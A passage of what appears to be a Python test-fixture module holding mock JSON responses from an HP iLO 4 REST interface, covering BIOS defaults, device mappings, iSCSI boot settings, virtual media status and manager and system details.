}
]
},
{
"Associations": [
"EmbSasEnable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1,0x0)/Pci(0x0,0x0)",
"Instance": 4,
"Subinstances": []
},
{
"Associations": [
"FlexLom1Enable",
{
"PreBootNetwork": "FlexLom1"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x2)/Pci(0x0,0x0)",
"Instance": 5,
"Subinstances": []
},
{
"Associations": [
"PciSlot1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"Instance": 6,
"Subinstances": []
},
{
"Associations": [
"PciSlot3Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"Instance": 7,
"Subinstances": []
},
{
"Associations": [
"PciSlot2Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x3,0x2)/Pci(0x0,0x0)",
"Instance": 8,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)",
"Instance": 9,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x1)",
"Instance": 10,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(1,MBR,0x000677A4,0x800,0x2800)",
"Instance": 11,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(2,MBR,0x000677A4,0x3000,0x800)",
"Instance": 12,
"Subinstances": []
},
{
"Associations": [
"Slot1StorageBoot"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Scsi(0x0,0x0)/HD(3,MBR,0x000677A4,0x3800,0x6400000)",
"Instance": 13,
"Subinstances": []
}
],
"Modified": "2015-05-22T06:48:46+00:00",
"Name": "Bios Setting Mapping to Devices",
"Type": "HpBiosMapping.1.2.0",
"links": {
"self": {
"href": "/rest/v1/systems/1/bios/Mappings"
}
}
}
"""
GET_BASE_CONFIG = """
{
"BaseConfigs":
[
{
"default":
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": "",
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "BIOS System Defaults",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSas1Boot": "AllTargets",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": "",
"OldPowerOnPassword": "",
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": "",
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBoot": "Disabled",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Slot2StorageBoot": "AllTargets",
"Slot3StorageBoot": "AllTargets",
"Slot4StorageBoot": "AllTargets",
"Slot5StorageBoot": "AllTargets",
"Slot6StorageBoot": "AllTargets",
"Sriov": "Enabled",
"TcmOperation": "Disable",
"TcmVisibility": "Visible",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "UtcM7",
"Tpm2Operation": "NoAction",
"Tpm2Ppi": "Disabled",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmOperation": "Disable",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled"
}
}
],
"Capabilities":
{
"BaseConfig": true,
"BaseConfigs": false
},
"Modified": "2015-03-26T00:05:15+00:00",
"Name": "BIOS Default Settings",
"Type": "HpBaseConfigs.0.10.0",
"links":
{
"self":
{
"href": "/rest/v1/systems/1/bios/BaseConfigs"
}
}
}
"""
GET_DEFAULT_CONFIG = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": "",
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "BIOS System Defaults",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSas1Boot": "AllTargets",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": "",
"OldPowerOnPassword": "",
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": "",
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBoot": "Disabled",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Slot2StorageBoot": "AllTargets",
"Slot3StorageBoot": "AllTargets",
"Slot4StorageBoot": "AllTargets",
"Slot5StorageBoot": "AllTargets",
"Slot6StorageBoot": "AllTargets",
"Sriov": "Enabled",
"TcmOperation": "Disable",
"TcmVisibility": "Visible",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeZone": "UtcM7",
"Tpm2Operation": "NoAction",
"Tpm2Ppi": "Disabled",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmOperation": "Disable",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled"
}
"""
GET_ISCSI_PATCH = """
{
"iSCSIBootSources": [
{
"iSCSIBootAttemptInstance": 1,
"iSCSIBootAttemptName": "NicBoot1",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot1",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 2,
"iSCSIBootAttemptName": "NicBoot2",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot2",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 3,
"iSCSIBootAttemptName": "NicBoot3",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot3",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
},
{
"iSCSIBootAttemptInstance": 4,
"iSCSIBootAttemptName": "NicBoot4",
"iSCSIBootLUN": "1",
"iSCSINicSource": "NicBoot4",
"iSCSITargetIpAddress": "10.10.1.30",
"iSCSITargetName": "iqn.2011-07.com.example.server:test1",
"iSCSITargetTcpPort": 3260
}
]
}
"""
GET_ISCSI_SETTINGS = """
{
"AttributRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"Description": "This is the Server iSCSI Software Initiator Current \
Settings",
"Modified": "2015-05-28T04:11:55+00:00",
"Name": "iSCSI Software Initiator Current Settings",
"SettingsResult": {
"ETag": "D43535CE",
"Messages": [
{
"MessageArgs": [
"iSCSITargetTcpport"
],
"MessageID": "Base.1.0:PropertyUnknown"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-28T04:11:55+00:00"
},
"Type": "HpiSCSISoftwareInitiator.1.0.0",
"iSCSIBootSources": [
{
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 1,
"iSCSIBootAttemptName": "NicBoot1",
"iSCSIBootEnable": "Enabled",
"iSCSIBootLUN": "1",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 1000,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": "NicBoot1",
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": false,
"iSCSITargetIpAddress": "10.10.1.38",
"iSCSITargetName": "iqn.2014-07.com.tecmint:tgt1",
"iSCSITargetTcpPort": 3260
},
{
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "test2",
"iSCSIBootEnable": "Enabled",
"iSCSIBootLUN": "1",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 1000,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": "NicBoot1",
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": false,
"iSCSITargetIpAddress": "10.10.1.38",
"iSCSITargetName": "iqn.2014-07.com.tecmint:tgt1",
"iSCSITargetTcpPort": 3260
},
{
"StructuredBootString": null,
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "",
"iSCSIBootEnable": "Disabled",
"iSCSIBootLUN": "0",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 100,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": null,
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": true,
"iSCSITargetIpAddress": "0.0.0.0",
"iSCSITargetName": null,
"iSCSITargetTcpPort": 0
},
{
"StructuredBootString": null,
"UEFIDevicePath": null,
"iSCSIAuthenticationMethod": "None",
"iSCSIBootAttemptInstance": 0,
"iSCSIBootAttemptName": "",
"iSCSIBootEnable": "Disabled",
"iSCSIBootLUN": "0",
"iSCSIChapSecret": null,
"iSCSIChapType": "OneWay",
"iSCSIChapUsername": null,
"iSCSIConnectRetry": 0,
"iSCSIConnectTimeoutMS": 100,
"iSCSIInitiatorGateway": "0.0.0.0",
"iSCSIInitiatorInfoViaDHCP": true,
"iSCSIInitiatorIpAddress": "0.0.0.0",
"iSCSIInitiatorNetmask": "0.0.0.0",
"iSCSIIpAddressType": "IPv4",
"iSCSINicSource": null,
"iSCSIReverseChapSecret": null,
"iSCSIReverseChapUsername": null,
"iSCSITargetInfoViaDHCP": true,
"iSCSITargetIpAddress": "0.0.0.0",
"iSCSITargetName": null,
"iSCSITargetTcpPort": 0
}
],
"iSCSIInitiatorName": "iqn.1986-03.com.hp:uefi-p89-mxq45006w5",
"iSCSINicSources": [
"NicBoot1",
"NicBoot2",
"NicBoot3",
"NicBoot4"
],
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/iScsi/BaseConfigs"
},
"Mappings": {
"href": "/rest/v1/systems/1/bios/Mappings"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/iScsi/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/iScsi"
}
}
}
"""
RESP_VM_STATUS_FLOPPY_EMPTY = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {
"href": "/rest/v1/Managers/1/VirtualMedia/1"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "",
"ConnectedVia": "NotConnected",
"MediaTypes": [
"Floppy",
"USBStick"
],
"WriteProtected": false,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_FLOPPY_EMPTY = """
{
"WRITE_PROTECT": "NO",
"VM_APPLET": "DISCONNECTED",
"IMAGE_URL": "",
"BOOT_OPTION": "NO_BOOT",
"DEVICE": "FLOPPY",
"IMAGE_INSERTED": "NO"
}
"""
RESP_VM_STATUS_FLOPPY_INSERTED = """
{
"ImageName": "floppy.iso",
"Description": "Virtual Removable Media",
"links": {
"self": {
"href": "/rest/v1/Managers/1/VirtualMedia/1"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "http://1.1.1.1/floppy.iso",
"ConnectedVia": "URI",
"MediaTypes": [
"Floppy",
"USBStick"
],
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_FLOPPY_INSERTED = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "CONNECTED",
"IMAGE_URL": "http://1.1.1.1/floppy.iso",
"BOOT_OPTION": "BOOT_ALWAYS",
"DEVICE": "FLOPPY",
"IMAGE_INSERTED": "YES"
}
"""
RESP_VM_STATUS_CDROM_INSERTED = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "http://foo/foo", "ConnectedVia": "NotConnected",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
RESP_VM_STATUS_CDROM_EMPTY = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "", "ConnectedVia": "NotConnected",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_CDROM_EMPTY = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "DISCONNECTED",
"IMAGE_URL": "",
"BOOT_OPTION": "NO_BOOT",
"DEVICE": "CDROM",
"IMAGE_INSERTED": "NO"}
"""
RESP_VM_STATUS_CDROM_INSERTED = """
{
"ImageName": "cdrom.iso",
"Description": "Virtual Removable Media",
"links": {"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"}},
"Type": "VirtualMedia.0.9.5",
"Image": "http://1.1.1.1/cdrom.iso",
"ConnectedVia": "URI",
"MediaTypes": [
"CD",
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": true,
"Name": "VirtualMedia"
}
"""
GET_VM_STATUS_CDROM_INSERTED = """
{
"WRITE_PROTECT": "YES",
"VM_APPLET": "CONNECTED",
"IMAGE_URL": "http://1.1.1.1/cdrom.iso",
"BOOT_OPTION": "BOOT_ALWAYS",
"DEVICE": "CDROM",
"IMAGE_INSERTED": "YES"
}
"""
PATCH_VM_CDROM = """
{
"Oem": {
"Hp": {
"BootOnNextServerReset": true
}
}
}
"""
GET_MANAGER_DETAILS_NO_VMEDIA = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 20,
"Time": "",
"VersionString": "iLO 4 v2.20"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
RESP_VM_STATUS_CDROM_MISSING = """
{
"Description": "Virtual Removable Media",
"links": {
"self": {"href": "/rest/v1/Managers/1/VirtualMedia/2"
}
},
"Type": "VirtualMedia.0.9.5",
"Image": "", "ConnectedVia": "NotConnected",
"MediaTypes": [
"DVD"
],
"Oem": {
"Hp": {
"Type": "HpiLOVirtualMedia.0.9.5",
"BootOnNextServerReset": false
}
},
"WriteProtected": true,
"Inserted": false,
"Name": "VirtualMedia"
}
"""
RESP_BODY_FOR_SYSTEM_WITH_CDROM = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Once",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "Cd",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
